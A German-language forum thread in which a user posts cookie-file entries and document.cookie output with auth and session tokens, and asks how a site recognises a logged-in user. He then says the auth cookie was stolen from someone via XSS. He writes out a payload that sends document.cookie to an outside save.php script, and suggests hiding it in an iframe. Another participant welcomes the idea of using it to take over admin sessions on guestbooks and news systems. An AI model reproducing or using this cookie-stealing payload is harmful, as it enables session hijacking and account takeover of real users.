An was erkennt die Seite ob meine Cookies stimmen?

X

Xalon

0
Ich hab mal wieder paar Probleme mit Cookies ;)
Also,erst mal alle Cookies der Seite in der Lokalen Cookiedatei:

Code: 
.seite.de	TRUE	/	FALSE	1137684015	__utmb	79435669
.seite.de	TRUE	/	FALSE	2147385600	__utma	79435669.953149259.1134761371.1137680812.1137682216.89
.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
.seite.de	TRUE	/	FALSE	1152013888	__utmz	79435669.1136245889.58.2.utmccn=(organic)|utmcsr=google|utmctr=nudelkind|utmcmd=organic
.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D

So,mehr steht nicht in der Cookiedatei...
Wenn ich jetzt auf der Seite meine Cookies via document.cookie ausgeben lasse kommt folgendes:

Code: 
auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20session=4x%7CBW;%20__utma=79435669.1421511096.1137259645.1137524527.1137528250.6;%20__utmb=79435669;%20__utmz=79435669.1137259645.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none);%20auth=TlJcVx5GSURJEk5ZFVVGRh1VVhxVTB4UUFwUXRheR3dOBAADAg1IHUhTTxwVTk1VTlVQG05DQBpYRVwa;%20__utmc=79435669

Jetzt mal meine Frage:Kann jemand erkennen an was einen díe Seite wiedererkennt?Also an was sie erkennt unter welchem Namen man sich eingeloggt hat?

Danke im voraus,
Xalon
 
also sehr oft wird in dem cookie nur ein session key abgelegt, zu welchem passend die daten nicht im cookie sondern auf den jeweiligen servern liegen.

Sagen wir mal ich bin ein Server ( :D ) und du kommst jetzt mit deinem Namen bei mir vorbei...dein name speichere ich dann und gebe dir einen Session-key (unter dem ich den namen wiederfinden kann...macht natürlich erst sinn bei informationen, die etwas umfangreicher sind als Namen). So ähnlich als wenn du ne URL eingibst. In der URL sind ja auch nicht die Webinhalte der Seite gespeichert, sondern es ist nur die Adresse, die auf den Inhalt der Seite verweißt.

MfG
Lord
 
Jaja,keine Angst,das weiß ich schon^^
Nur variablen wie __utmb __utma __utmz und auth werden ja immer gespeichert,also frage ich mich wo die Seite den Sessionkey hernimmt o_O

Hierher vielleicht:
Code: 
.www.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D
Naja das gleicht ja fast
Code: 
.seite.de	TRUE	/	FALSE	1168440615	auth	TlJcVx5GSURJEk5ZFVVGRh1VVx5VTB4UUFwUXRteR3dOBAADRxQaTkBaB1UWTVUWG1ZTFkNAQxdDXBo%3D

oder hier im Cookieoutput mit Java is vollgendes:

Code: 
session=4x%7CBW;

Wo wird das gespeichert?In der Cookiedatei is des net...Wo dann?

Oder is das ne besondere Variable?

Also meine Frage wo spiechert der Server den Authentication-Cookie?

Danke im Voraus,
Xalon

P.S.:
@Lord_Nykon:Biste n Apache odern ISS? xD
 
Okay, dann tut's mir Leid.
Da habe ich deine Frage ein wenig falsch verstanden^^ Sorry.

Da kann ich leider im Moment nicht weiterhelfen.

MfG
Lord

P.S.: Weder noch ;) Ich bin mein eigener Server mit dem Namen HNS aka "Human Network System" :D :D *scnr*
 
also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen
 
Original von ElLute
also mit den spärlichen infos wirst du kaum infos bekommen die dir weiterhelfen... und server sind normalerweise nicht so blöd, dass sie sich von einem gefälschtem cookie linken lassen
Zum Vergrößern anklicken....

Und woher soll der Server das merken?Und welche Infos bracht ihr noch?

Xalon
 
der server kriegt von dir eine ID die nach einem bestimmten algorithmus generiert wurde, also sieht er, obs eine ID von ihm ist... und dann sieht er in seiner Datenbank nach den dazu gespeicherten daten nach und schickt dir dann deine persönliche seite... so war glaub ich das konzept von cookies...
 
Jap ich weiß den Cookie den ich schicke hab ich ja über XSS geklaut ;)
Naja ich schreib mir ez einfach selbr ein Programm um dann die Cookies zu nutzen dann bracuh ich Firefox gar nimmer^^

Xalon
 
Na indem man folgendes ausführen lässt:
location.href="blubb.de/save.php?to_save="+document.cookie
Noch besser natürlich in nem Iframe

Xalon

Edit:Ups hab ivegotmail's net glesen
 
also im prinzip geht es darum Code einzuschleusen,
sobald sich dann zB in einem Board ein Admin einloggt
wird dessen cookie gespeichert (per email an mich geschickt oder sowas)
und man hat die Zugangsdaten

hab ich das jetzt richtig verstanden?
 
stimmt, meinte ich auch eigentlich
man hat das cookie und dann hat man zugang

die Lücke gefällt mir :D
es gibt bestimmt n'paar Gästebücher, News-Systeme oder sonstwas,
bei denen sich das einfach ausnutzen lässt

bis jetzt hab ich immer nur an include() gedacht
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben